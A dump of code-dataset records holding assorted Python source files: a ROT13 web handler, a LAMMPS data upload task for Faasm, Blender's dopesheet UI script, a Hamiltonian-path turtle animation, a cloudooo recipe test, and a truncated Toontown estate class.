\n\n \n
    \n

    Enter some text to ROT13:

    \n
    \n \n
    \n \n
    \n \n\n\n\"\"\"\n\n#handler for /rot13\nclass ROT13(webapp2.RequestHandler):\n def write_form(self, user_input=\"\"):\n encoded_output = user_input.encode('rot13')\n self.response.out.write(form % {'encoded_output': cgi.escape(encoded_output, quote=True) })\n\n def get(self):\n self.write_form()\n\n def post(self):\n user_input = self.request.get(\"text\")\n self.write_form(user_input)\n","sub_path":"unit2/rot13.py","file_name":"rot13.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"536222250","text":"from invoke import task\nfrom os.path import exists, join\nimport requests\n\nfrom tasks.lammps.env import (\n LAMMPS_DIR,\n LAMMPS_FAASM_DATA_PREFIX,\n get_faasm_benchmark,\n)\nfrom tasks.util.faasm import get_faasm_upload_host_port\n\n\n@task(default=True, iterable=[\"bench\"])\ndef upload(ctx, bench):\n \"\"\"\n Upload LAMMPS benchmark data to Faasm\n \"\"\"\n for b in bench:\n _bench = get_faasm_benchmark(b)\n\n host, port = get_faasm_upload_host_port()\n url = \"http://{}:{}/file\".format(host, port)\n\n # Upload all data corresponding to the benchmark\n for data in _bench[\"data\"]:\n file_name = data.split(\"/\")[-1]\n host_path = join(LAMMPS_DIR, data + \".faasm\")\n faasm_path = join(LAMMPS_FAASM_DATA_PREFIX, file_name)\n\n if not exists(host_path):\n print(\"Did not find data at {}\".format(host_path))\n raise RuntimeError(\"Did not find LAMMPS data!\")\n\n print(\n \"Uploading LAMMPS data ({}) to {} ({})\".format(\n host_path, url, faasm_path\n )\n )\n response = requests.put(\n url,\n data=open(host_path, \"rb\"),\n headers={\"FilePath\": faasm_path},\n )\n\n print(\n \"Response {}: {}\".format(response.status_code, response.text)\n )\n\n if response.status_code != 200:\n raise RuntimeError(\"Error uploading LAMMPS data!\")\n","sub_path":"tasks/lammps/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"334960945","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nimport bpy\nfrom bpy.types import (\n Header,\n Menu,\n Panel,\n)\n\n#######################################\n# DopeSheet Filtering - Header Buttons\n\n# used for DopeSheet, NLA, and Graph Editors\n\n\ndef dopesheet_filter(layout, context, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n row = layout.row(align=True)\n row.prop(dopesheet, \"show_only_selected\", text=\"\")\n row.prop(dopesheet, \"show_hidden\", text=\"\")\n\n if is_nla:\n row.prop(dopesheet, \"show_missing_nla\", text=\"\")\n else: # graph and dopesheet editors - F-Curves and drivers only\n row.prop(dopesheet, \"show_only_errors\", text=\"\")\n\n if not generic_filters_only:\n if bpy.data.collections:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_collection\", text=\"\")\n\n if not is_nla:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = layout.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n#######################################\n# Dopesheet Filtering Popovers\n\n# Generic Layout - Used as base for filtering popovers used in all animation editors\n# Used for DopeSheet, NLA, and Graph Editors\n\n\nclass DopesheetFilterPopoverBase:\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n # Generic = Affects all datatypes\n # XXX: Perhaps we want these to stay in the header instead, for easy/fast access\n @classmethod\n def draw_generic_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.prop(dopesheet, \"show_only_selected\", icon='NONE')\n col.prop(dopesheet, \"show_hidden\", icon='NONE')\n\n if is_nla:\n col.prop(dopesheet, \"show_missing_nla\", icon='NONE')\n else: # graph and dopesheet editors - F-Curves and drivers only\n col.prop(dopesheet, \"show_only_errors\", icon='NONE')\n\n # Name/Membership Filters\n # XXX: Perhaps these should just stay in the headers (exclusively)?\n @classmethod\n def draw_search_filters(cls, context, layout, generic_filters_only=False):\n dopesheet = context.space_data.dopesheet\n is_nla = context.area.type == 'NLA_EDITOR'\n\n col = layout.column(align=True)\n col.label(text=\"With Name:\")\n if not is_nla:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_fcurve_name\", text=\"\")\n else:\n row = col.row(align=True)\n row.prop(dopesheet, \"filter_text\", text=\"\")\n\n if (not generic_filters_only) and (bpy.data.collections):\n col = layout.column(align=True)\n col.label(text=\"In Collection:\")\n col.prop(dopesheet, \"filter_collection\", text=\"\")\n\n # Standard = Present in all panels\n @classmethod\n def draw_standard_filters(cls, context, layout):\n dopesheet = context.space_data.dopesheet\n\n # datablock filters\n layout.label(text=\"Filter by Type:\")\n flow = layout.grid_flow(row_major=True, columns=2, even_rows=False, align=False)\n\n flow.prop(dopesheet, \"show_scenes\", text=\"Scenes\")\n flow.prop(dopesheet, \"show_nodes\", text=\"Node Trees\")\n\n # object types\n if bpy.data.armatures:\n flow.prop(dopesheet, \"show_armatures\", text=\"Armatures\")\n if bpy.data.cameras:\n flow.prop(dopesheet, \"show_cameras\", text=\"Cameras\")\n if bpy.data.grease_pencil:\n flow.prop(dopesheet, \"show_gpencil\", text=\"Grease Pencil Objects\")\n if bpy.data.lights:\n flow.prop(dopesheet, \"show_lights\", text=\"Lights\")\n if bpy.data.meshes:\n flow.prop(dopesheet, \"show_meshes\", text=\"Meshes\")\n if bpy.data.curves:\n flow.prop(dopesheet, \"show_curves\", text=\"Curves\")\n if bpy.data.lattices:\n flow.prop(dopesheet, \"show_lattices\", text=\"Lattices\")\n if bpy.data.metaballs:\n flow.prop(dopesheet, \"show_metaballs\", text=\"Metaballs\")\n\n # data types\n flow.prop(dopesheet, \"show_worlds\", text=\"Worlds\")\n if bpy.data.particles:\n flow.prop(dopesheet, \"show_particles\", text=\"Particles\")\n if bpy.data.linestyles:\n flow.prop(dopesheet, \"show_linestyles\", text=\"Line Styles\")\n if bpy.data.speakers:\n flow.prop(dopesheet, \"show_speakers\", text=\"Speakers\")\n if bpy.data.materials:\n flow.prop(dopesheet, \"show_materials\", text=\"Materials\")\n if bpy.data.textures:\n flow.prop(dopesheet, \"show_textures\", text=\"Textures\")\n if bpy.data.shape_keys:\n flow.prop(dopesheet, \"show_shapekeys\", text=\"Shape Keys\")\n if bpy.data.cache_files:\n flow.prop(dopesheet, \"show_cache_files\", text=\"Cache Files\")\n\n layout.separator()\n\n # Object Data Filters\n\n # TODO: Add per-channel/axis convenience toggles?\n split = layout.split()\n\n col = split.column()\n col.prop(dopesheet, \"show_transforms\", text=\"Transforms\")\n\n col = split.column()\n col.prop(dopesheet, \"show_modifiers\", text=\"Modifiers\")\n\n layout.separator()\n\n # performance-related options (users will mostly have these enabled)\n col = layout.column(align=True)\n col.label(text=\"Options:\")\n col.prop(dopesheet, \"use_datablock_sort\", icon='NONE')\n\n\n# Popover for Dopesheet Editor(s) - Dopesheet, Action, Shapekey, GPencil, Mask, etc.\nclass DOPESHEET_PT_filters(DopesheetFilterPopoverBase, Panel):\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_region_type = 'HEADER'\n bl_label = \"Filters\"\n\n def draw(self, context):\n layout = self.layout\n\n dopesheet = context.space_data.dopesheet\n ds_mode = context.space_data.mode\n\n layout.prop(dopesheet, \"show_summary\", text=\"Summary\")\n\n DopesheetFilterPopoverBase.draw_generic_filters(context, layout)\n\n if ds_mode in {'DOPESHEET', 'ACTION', 'GPENCIL'}:\n layout.separator()\n generic_filters_only = ds_mode != 'DOPESHEET'\n DopesheetFilterPopoverBase.draw_search_filters(context, layout,\n generic_filters_only=generic_filters_only)\n\n if ds_mode == 'DOPESHEET':\n layout.separator()\n DopesheetFilterPopoverBase.draw_standard_filters(context, layout)\n\n\n#######################################\n# DopeSheet Editor - General/Standard UI\n\nclass DOPESHEET_HT_header(Header):\n bl_space_type = 'DOPESHEET_EDITOR'\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n row = layout.row(align=True)\n row.template_header()\n\n if st.mode == 'TIMELINE':\n from .space_time import (\n TIME_MT_editor_menus,\n TIME_HT_editor_buttons,\n )\n TIME_MT_editor_menus.draw_collapsible(context, layout)\n TIME_HT_editor_buttons.draw_header(context, layout)\n else:\n layout.prop(st, \"ui_mode\", text=\"\")\n\n DOPESHEET_MT_editor_menus.draw_collapsible(context, layout)\n DOPESHEET_HT_editor_buttons.draw_header(context, layout)\n\n\n# Header for \"normal\" dopesheet editor modes (e.g. Dope Sheet, Action, Shape Keys, etc.)\nclass DOPESHEET_HT_editor_buttons(Header):\n bl_idname = \"DOPESHEET_HT_editor_buttons\"\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_label = \"\"\n\n def draw(self, context):\n pass\n\n @staticmethod\n def draw_header(context, layout):\n st = context.space_data\n tool_settings = context.tool_settings\n\n if st.mode in {'ACTION', 'SHAPEKEY'}:\n # TODO: These buttons need some tidying up -\n # Probably by using a popover, and bypassing the template_id() here\n row = layout.row(align=True)\n row.operator(\"action.layer_prev\", text=\"\", icon='TRIA_DOWN')\n row.operator(\"action.layer_next\", text=\"\", icon='TRIA_UP')\n\n row = layout.row(align=True)\n row.operator(\"action.push_down\", text=\"Push Down\", icon='NLA_PUSHDOWN')\n row.operator(\"action.stash\", text=\"Stash\", icon='FREEZE')\n\n layout.separator_spacer()\n\n layout.template_ID(st, \"action\", new=\"action.new\", unlink=\"action.unlink\")\n\n layout.separator_spacer()\n\n if st.mode == 'DOPESHEET':\n dopesheet_filter(layout, context)\n elif st.mode == 'ACTION':\n # 'generic_filters_only' limits the options to only the relevant 'generic' subset of\n # filters which will work here and are useful (especially for character animation)\n dopesheet_filter(layout, context, generic_filters_only=True)\n elif st.mode == 'GPENCIL':\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_gpencil_3d_only\", text=\"Active Only\")\n\n if st.dopesheet.show_gpencil_3d_only:\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_only_selected\", text=\"\")\n row.prop(st.dopesheet, \"show_hidden\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"filter_text\", text=\"\")\n\n layout.popover(\n panel=\"DOPESHEET_PT_filters\",\n text=\"\",\n icon='FILTER',\n )\n\n # Grease Pencil mode doesn't need snapping, as it's frame-aligned only\n if st.mode != 'GPENCIL':\n layout.prop(st, \"auto_snap\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(tool_settings, \"use_proportional_action\", text=\"\", icon_only=True)\n sub = row.row(align=True)\n sub.active = tool_settings.use_proportional_action\n sub.prop(tool_settings, \"proportional_edit_falloff\", text=\"\", icon_only=True)\n\n\nclass DOPESHEET_MT_editor_menus(Menu):\n bl_idname = \"DOPESHEET_MT_editor_menus\"\n bl_label = \"\"\n\n def draw(self, context):\n layout = self.layout\n st = context.space_data\n\n layout.menu(\"DOPESHEET_MT_view\")\n layout.menu(\"DOPESHEET_MT_select\")\n layout.menu(\"DOPESHEET_MT_marker\")\n\n if st.mode == 'DOPESHEET' or (st.mode == 'ACTION' and st.action is not None):\n layout.menu(\"DOPESHEET_MT_channel\")\n elif st.mode == 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_gpencil_channel\")\n\n if st.mode != 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_key\")\n else:\n layout.menu(\"DOPESHEET_MT_gpencil_frame\")\n\n\nclass DOPESHEET_MT_view(Menu):\n bl_label = \"View\"\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n layout.operator(\"action.properties\", icon='MENU_PANEL')\n layout.separator()\n\n layout.prop(st.dopesheet, \"use_multi_word_filter\", text=\"Multi-word Match Search\")\n\n layout.separator()\n\n layout.prop(st, \"use_realtime_update\")\n layout.prop(st, \"show_frame_indicator\")\n layout.prop(st, \"show_sliders\")\n layout.prop(st, \"show_group_colors\")\n layout.prop(st, \"show_interpolation\")\n layout.prop(st, \"show_extremes\")\n layout.prop(st, \"use_auto_merge_keyframes\")\n\n layout.prop(st, \"show_seconds\")\n layout.prop(st, \"show_locked_time\")\n\n layout.separator()\n layout.operator(\"anim.previewrange_set\")\n layout.operator(\"anim.previewrange_clear\")\n layout.operator(\"action.previewrange_set\")\n\n layout.separator()\n layout.operator(\"action.view_all\")\n layout.operator(\"action.view_selected\")\n layout.operator(\"action.view_frame\")\n\n # Add this to show key-binding (reverse action in dope-sheet).\n layout.separator()\n props = layout.operator(\"wm.context_set_enum\", text=\"Toggle Graph Editor\", icon=\"GRAPH\")\n props.data_path = \"area.type\"\n props.value = 'GRAPH_EDITOR'\n\n layout.separator()\n layout.menu(\"INFO_MT_area\")\n\n\nclass DOPESHEET_MT_select(Menu):\n bl_label = \"Select\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.select_all\", text=\"All\").action = 'SELECT'\n layout.operator(\"action.select_all\", text=\"None\").action = 'DESELECT'\n layout.operator(\"action.select_all\", text=\"Invert\").action = 'INVERT'\n\n layout.separator()\n layout.operator(\"action.select_box\").axis_range = False\n layout.operator(\"action.select_box\", text=\"Border Axis Range\").axis_range = True\n\n layout.operator(\"action.select_circle\")\n\n layout.separator()\n layout.operator(\"action.select_column\", text=\"Columns on Selected Keys\").mode = 'KEYS'\n layout.operator(\"action.select_column\", text=\"Column on Current Frame\").mode = 'CFRA'\n\n layout.operator(\"action.select_column\", text=\"Columns on Selected Markers\").mode = 'MARKERS_COLUMN'\n layout.operator(\"action.select_column\", text=\"Between Selected Markers\").mode = 'MARKERS_BETWEEN'\n\n layout.separator()\n props = layout.operator(\"action.select_leftright\", text=\"Before Current Frame\")\n props.extend = False\n props.mode = 'LEFT'\n props = layout.operator(\"action.select_leftright\", text=\"After Current Frame\")\n props.extend = False\n props.mode = 'RIGHT'\n\n # FIXME: grease pencil mode isn't supported for these yet, so skip for that mode only\n if context.space_data.mode != 'GPENCIL':\n layout.separator()\n layout.operator(\"action.select_more\")\n layout.operator(\"action.select_less\")\n\n layout.separator()\n layout.operator(\"action.select_linked\")\n\n\nclass DOPESHEET_MT_marker(Menu):\n bl_label = \"Marker\"\n\n def draw(self, context):\n layout = self.layout\n\n from .space_time import marker_menu_generic\n marker_menu_generic(layout)\n\n st = context.space_data\n\n if st.mode in {'ACTION', 'SHAPEKEY'} and st.action:\n layout.separator()\n layout.prop(st, \"show_pose_markers\")\n\n if st.show_pose_markers is False:\n layout.operator(\"action.markers_make_local\")\n\n layout.prop(st, \"use_marker_sync\")\n\n#######################################\n# Keyframe Editing\n\n\nclass DOPESHEET_MT_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_setting_toggle\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_enable\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_disable\", \"type\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n layout.operator(\"anim.channels_fcurves_enable\")\n\n\nclass DOPESHEET_MT_key(Menu):\n bl_label = \"Key\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.keyframe_insert\")\n\n layout.separator()\n layout.operator(\"action.frame_jump\")\n\n layout.separator()\n layout.operator(\"action.copy\")\n layout.operator(\"action.paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator_menu_enum(\"action.keyframe_type\", \"type\", text=\"Keyframe Type\")\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n\n layout.separator()\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n layout.operator(\"action.sample\")\n\n\nclass DOPESHEET_MT_key_transform(Menu):\n bl_label = \"Transform\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"transform.transform\", text=\"Move\").mode = 'TIME_TRANSLATE'\n layout.operator(\"transform.transform\", text=\"Extend\").mode = 'TIME_EXTEND'\n layout.operator(\"transform.transform\", text=\"Slide\").mode = 'TIME_SLIDE'\n layout.operator(\"transform.transform\", text=\"Scale\").mode = 'TIME_SCALE'\n\n\n#######################################\n# Grease Pencil Editing\n\nclass DOPESHEET_MT_gpencil_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_setting_toggle\")\n layout.operator(\"anim.channels_setting_enable\")\n layout.operator(\"anim.channels_setting_disable\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n\n # XXX: to be enabled when these are ready for use!\n # layout.separator()\n # layout.operator(\"anim.channels_expand\")\n # layout.operator(\"anim.channels_collapse\")\n\n # layout.separator()\n #layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n\nclass DOPESHEET_MT_gpencil_frame(Menu):\n bl_label = \"Frame\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.duplicate\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator(\"action.keyframe_type\")\n\n # layout.separator()\n # layout.operator(\"action.copy\")\n # layout.operator(\"action.paste\")\n\n\nclass DOPESHEET_MT_delete(Menu):\n bl_label = \"Delete\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n\n\nclass DOPESHEET_MT_specials(Menu):\n bl_label = \"Dope Sheet Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.copy\", text=\"Copy\")\n layout.operator(\"action.paste\", text=\"Paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n layout.operator_menu_enum(\"action.easing_type\", \"type\", text=\"Easing Type\")\n\n layout.separator()\n\n layout.operator(\"action.keyframe_insert\").type = 'SEL'\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n\n\nclass DOPESHEET_MT_channel_specials(Menu):\n bl_label = \"Dope Sheet Channel Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"anim.channels_setting_enable\", text=\"Mute Channels\").type = 'MUTE'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unmute Channels\").type = 'MUTE'\n layout.separator()\n layout.operator(\"anim.channels_setting_enable\", text=\"Protect Channels\").type = 'PROTECT'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unprotect Channels\").type = 'PROTECT'\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n\n layout.operator(\"anim.channels_delete\")\n\n\nclass DOPESHEET_MT_snap_pie(Menu):\n bl_label = \"Snap\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n\n pie.operator(\"action.snap\", text=\"Current Frame\").type = 'CFRA'\n pie.operator(\"action.snap\", text=\"Nearest Frame\").type = 'NEAREST_FRAME'\n pie.operator(\"action.snap\", text=\"Nearest Second\").type = 'NEAREST_SECOND'\n pie.operator(\"action.snap\", text=\"Nearest Marker\").type = 'NEAREST_MARKER'\n\n\nclasses = (\n DOPESHEET_HT_header,\n DOPESHEET_HT_editor_buttons,\n DOPESHEET_MT_editor_menus,\n DOPESHEET_MT_view,\n DOPESHEET_MT_select,\n DOPESHEET_MT_marker,\n DOPESHEET_MT_channel,\n DOPESHEET_MT_key,\n DOPESHEET_MT_key_transform,\n DOPESHEET_MT_gpencil_channel,\n DOPESHEET_MT_gpencil_frame,\n DOPESHEET_MT_delete,\n DOPESHEET_MT_specials,\n DOPESHEET_MT_channel_specials,\n DOPESHEET_MT_snap_pie,\n DOPESHEET_PT_filters,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n","sub_path":"engine/2.80/scripts/startup/bl_ui/space_dopesheet.py","file_name":"space_dopesheet.py","file_ext":"py","file_size_in_byte":23059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"204244506","text":"from time import time\nfrom HamPath import *\nnodes=[[0, 0], [2, 2], [2, 0], [1, 2]]\nimport turtle\nimport math\nx,y=nodes[0],nodes[1]\nzoom=int(100/(math.sqrt((y[0]-x[0])**2+(y[1]-x[1])**2)))\nupdated=[[x[0]*zoom,x[1]*zoom] for x in nodes]\ndef anima(nodes,con):\n screen = turtle.getscreen()\n t = turtle.Turtle()\n t.speed(0)\n t.pu()\n for a in range(node_count):\n t.goto(updated[a])\n t.dot(10)\n t.write(f\"({nodes[a][0]}, {nodes[a][1]})\")\n for element in connections:\n t.pu()\n x,y=element[0],element[1]\n t.goto(updated[x])\n t.pd()\n t.goto(updated[y])\n t.color(\"green\")\n t.pensize(3)\n h = all_paths[0]\n t.pu()\n t.goto(updated[int(h[0])])\n t.pd()\n for x in range(1,node_count):\n t.goto(updated[int(h[x])])\nanima(nodes,connections)\nprint(\"Execution time for animations: \")\nprint(f\"{time()-end} seconds\")\n","sub_path":"Python/HamPath+Animasi.py","file_name":"HamPath+Animasi.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"145715049","text":"import os\nimport sys\nimport unittest\n\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nfrom slapos.recipe import generic_cloudooo\n\nclass TestGenericCloudooo(unittest.TestCase):\n def new_recipe(self, options):\n buildout = {\n 'buildout': {\n 'bin-directory': '',\n 'find-links': '',\n 'allow-hosts': '',\n 'develop-eggs-directory': '',\n 'eggs-directory': '',\n 'python': 'testpython',\n },\n 'testpython': {\n 'executable': sys.executable,\n },\n 'slap-connection': {\n 'computer-id': '',\n 'partition-id': '',\n 'server-url': '',\n 'software-release-url': '',\n }\n }\n return generic_cloudooo.Recipe(buildout=buildout, name='generic_cloudooo', options=options)\n\n def setUp(self):\n self.test_dir = mkdtemp()\n def tearDown(self):\n if os.path.exists(self.test_dir):\n rmtree(self.test_dir)\n\n def test_install(self):\n # Basic check\n config_file_path = os.path.join(self.test_dir, \"test_install_configuration_file_etc_cloudooo-X.cfg\")\n recipe = self.new_recipe({\n \"ip\": \"test_install_ip\",\n \"environment\": \"test_install=environment\",\n \"mimetype_entry_addition\": \"text/install mimetype/entry addition\",\n \"ooo-binary-path\": \"test_install_ooo_binary_path\",\n \"ooo-paster\": \"test_install_ooo_paster\",\n \"ooo-uno-path\": \"test_ooo_uno_path\",\n \"port\": \"123\",\n \"openoffice-port\": \"234\",\n \"configuration-file\": config_file_path,\n \"data-directory\": os.path.join(self.test_dir, \"test_install_data_directory_srv_cloudooo-X\"),\n \"wrapper\": os.path.join(self.test_dir, \"test_install_wrapper_service_cloudooo-X\"),\n })\n recipe.install()\n data = open(config_file_path).read()\n self.assertIn(\"[app:main]\", data)\n self.assertIn(\"[server:main]\", data)\n\n # Check if mimetype_registry is well ordered\n self.assertIn(\"\\n text/install mimetype/entry addition\\n text/* * ooo\\n\", data)\n\n # Check OnlyOffice entries\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/vnd.openxmlformats-officedocument.presentationml.presentation application/x-asc-presentation x2t\",\n \" application/vnd.openxmlformats-officedocument.spreadsheetml.sheet application/x-asc-spreadsheet x2t\",\n \" application/vnd.openxmlformats-officedocument.wordprocessingml.document application/x-asc-text x2t\",\n \"\",\n ]), data)\n self.assertIn(\"\\n\".join([\n \"\",\n \" application/x-asc-presentation application/vnd.openxmlformats-officedocument.presentationml.presentation x2t\",\n \" application/x-asc-spreadsheet application/vnd.openxmlformats-officedocument.spreadsheetml.sheet x2t\",\n \" application/x-asc-text application/vnd.openxmlformats-officedocument.wordprocessingml.document x2t\",\n \"\",\n ]), data)\n","sub_path":"slapos/test/recipe/test_generic_cloudooo.py","file_name":"test_generic_cloudooo.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"645047200","text":"# File: t (Python 2.2)\n\nfrom direct.showbase.ShowBaseGlobal import *\nfrom toontown.toonbase.ToonBaseGlobal import *\nfrom toontown.toonbase.ToontownGlobals import *\nfrom toontown.distributed.ToontownMsgTypes import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom direct.fsm import ClassicFSM\nfrom direct.fsm import State\nfrom toontown.minigame import Purchase\nfrom otp.avatar import DistributedAvatar\nimport SkyUtil\nimport Hood\nfrom toontown.estate import EstateLoader\nfrom toontown.estate import HouseGlobals\nimport ZoneUtil\n\nclass EstateHood(Hood.Hood):\n notify = DirectNotifyGlobal.directNotify.newCategory('EstateHood')\n \n def __init__(self, parentFSM, doneEvent, dnaStore, hoodId):\n Hood.Hood.__init__(self, parentFSM, doneEvent, dnaStore, hoodId)\n self.fsm = ClassicFSM.ClassicFSM('Hood', [\n State.State('start', self.enterStart, self.exitStart, [\n 'safeZoneLoader']),\n State.State('safeZoneLoader', self.enterSafeZoneLoader, self.exitSafeZoneLoader, [\n 'quietZone']),\n State.State('quietZone', self.enterQuietZone, self.exitQuietZone, [\n 'safeZoneLoader']),\n State.State('final', self.enterFinal, self.exitFinal, [])], 'start', 'final')\n self.fsm.enterInitialState()\n self.id = MyEstate\n self.safeZoneLoaderClass = EstateLoader.EstateLoader\n self.storageDNAFile = 'phase_5.5/dna/storage_estate.dna'\n self.holidayStorageDNADict = {\n WINTER_DECORATIONS: [\n 'phase_5.5/dna/winter_storage_estate.dna'] }\n self.skyFile = 'phase_3.5/models/props/TT_sky'\n self.popupInfo = None\n\n \n def load(self):\n Hood.Hood.load(self)\n\n \n def unload(self):\n del self.safeZoneLoaderClass\n if self.popupInfo:\n self.popupInfo.destroy()\n self.popupInfo = None\n \n if not wantOtpServer:\n base.cr.disableAll()\n \n Hood.Hood.unload(self)\n\n \n def enter(self, requestStatus):\n hoodId = requestStatus['hoodId']\n zoneId = requestStatus['zoneId']\n self.accept('kickToPlayground', self.kickToPlayground)\n self.fsm.request(requestStatus['loader'], [\n requestStatus])\n\n \n def exit(self):\n if self.loader:\n self.loader.exit()\n self.loader.unload()\n del self.loader\n \n Hood.Hood.exit(self)\n\n \n def loadLoader(self, requestStatus):\n loaderName = requestStatus['loader']\n if loaderName == 'safeZoneLoader':\n self.loader = self.safeZoneLoaderClass(self, self.fsm.getStateNamed('safeZoneLoader'), self.loaderDoneEvent)\n self.loader.load()\n \n\n \n def spawnTitleText(self, zoneId):\n return None\n\n \n def hideTitleTextTask(self, task):\n return Task.done\n\n \n def kickToPlayground(self, retCode):\n if retCode == 0:\n msg = TTLocalizer.EstateOwnerLeftMessage % HouseGlobals.BOOT_GRACE_PERIOD\n self._EstateHood__popupKickoutMessage(msg)\n elif retCode == 1:\n zoneId = base.localAvatar.lastHood\n self.doneStatus = {\n 'loader': ZoneUtil.getBranchLoaderName(zoneId),\n 'where': ZoneUtil.getToonWhereName(zoneId),\n 'how': 'teleportIn',\n 'hoodId': zoneId,\n 'zoneId': 